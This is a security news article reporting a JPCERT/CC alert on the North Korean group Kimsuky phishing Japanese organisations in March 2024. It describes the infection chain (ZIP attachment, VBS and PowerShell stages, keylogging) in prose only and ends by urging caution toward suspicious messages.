The Japanese government sector in charge of computer emergency response matters has issued an alert about the North Korean advanced persistent threat group, Kimsuky, targeting Japanese organisations.
The US government has identified Kimsuky as a North Korean advanced persistent threat (APT) group that conducts attacks on targets worldwide to acquire intelligence, especially in the military and defence sector, for the benefit and interest of the Democratic People’s Republic of Korea (DPRK).
These threat actors are notorious for utilising social engineering and phishing to acquire initial access to targeted networks. Subsequently, they use well-known malware to steal data and establish persistence on compromised networks.
The country claims that these North Korean APT group’s attacks were detected earlier this year, with attribution based on indicators of compromise (IoCs) from various researchers. JPCERT/CC has also determined that an attack group known as Kimsuky targeted Japanese organisations in March 2024.
The North Korean state-sponsored threat group Kimsuky commonly initiated its attacks using phishing tactics.
The Kimsuky APT group begins its attacks by sending phishing emails to targets in Japan, impersonating security and diplomatic entities, and utilises a malicious ZIP attachment.
The ZIP file contains an executable that compromises the system with malware and two decoy document files. The executable filename has many spaces that make it seem like a document, concealing the appended [.]exe extension.
Once a victim executes the malicious Zip file, the payload downloads and executes a VBS archive while configuring ‘C:\Users\Public\Pictures\desktop.ini.bak’ to run automatically through the Wscript.
Subsequently, the VBS file downloads a PowerShell script that harvests data such as process lists, network details, file lists from directories, and user account information. The attackers then transfer this information to a remote URL.
This information also allows Kimsuky to identify whether the infected device is a legitimate user or an analysis environment. Finally, a new VBS file is created and executed, which downloads a PowerShell script that captures keystrokes and clipboard data and sends it to the attackers.
The keylogger’s information could contain credentials, allowing threat actors to penetrate the organisation’s systems and applications further.
Japanese organisations should be aware of this recent campaign by the North Korean APT group. Users, especially employees from the targeted sector, should be wary of suspicious messages as the Kimsuky operators widely use phishing tactics to start malicious campaigns.
